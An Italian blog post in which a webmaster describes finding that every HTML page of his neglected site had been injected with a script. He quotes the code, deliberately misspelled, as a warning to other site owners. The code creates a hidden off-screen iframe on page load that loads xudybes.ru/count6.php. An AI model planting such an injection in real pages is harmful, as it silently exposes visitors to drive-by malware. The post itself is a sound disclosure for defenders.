lunedì 29 ottobre 2012

Mio sito segnalato da google per malware (xudybes.ru)

Da un po' di tempo il mio sito veniva segnalato dal motore Google come diffusore di malware.
Dal momento che il sito è rimasto fermo a 3 anni fa in attesa di rifacimento (avessi il tempo), e non essendo visitato da nessuno, ma utilizzato ormai solo come "contenitore" di tutti i software che trovate qui menzionati sul blog, non gli ho mai dato la giusta considerazione. Fino a quando non mi è arrivato l'avviso del possibile blocco dell'intero sito.
Così, pensando di aver erroneamente caricato qualche programmino che gli antivirus possono rilevare come falsi positivi ( keygen, cure, wga, oga, e simili) e che non è mia intenzione mettere sul mio sito proprio per evitare spiacevoli conseguenze, ho iniziato la ricerca il tutte le cartelle e sottocartelle di eventuali file "malevoli". Effettivamente c'era qualche keygen caricato nei primi file del 2008. Rimosso tutto, ho rifatto controllare il sito da Google, ma ancora mi veniva segnalato come potenzialmente dannoso.
A questo punto allora ho approfondito la situazione e ho fatto una bella scoperta: qualcuno è riuscito ad entrare nel mio sito ed ha modificato tutte le pagine htm e html inserendo un codice pericoloso che riporto qui per eventuali altri webmaster.
Il codice inserito è questo (l'ho dovuto leggermente modificare perchè subito segnalato anche qui su blogger come pericoloso, ma per chi è del mestiere non dovrebbe avere problemi ad individuralo nelle proprie pagine web):
!--c3284d-->function frmAdd() {var ifrm = document.createElement('iframe');
ifrm.style.position='absoute';
ifrm.stye.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = "htp://xudybes.ru/count6.php";
ifrm.id = 'frmId';
documet.body.appendChild(ifrm);};
winow.onload = frmAdd;

<!--/c3284d--
Spero possa essere d'aiuto e spero di non incorrere più in questa spiacevole situazione....cambierò la password ogni mese adesso!!!!

Nessun commento: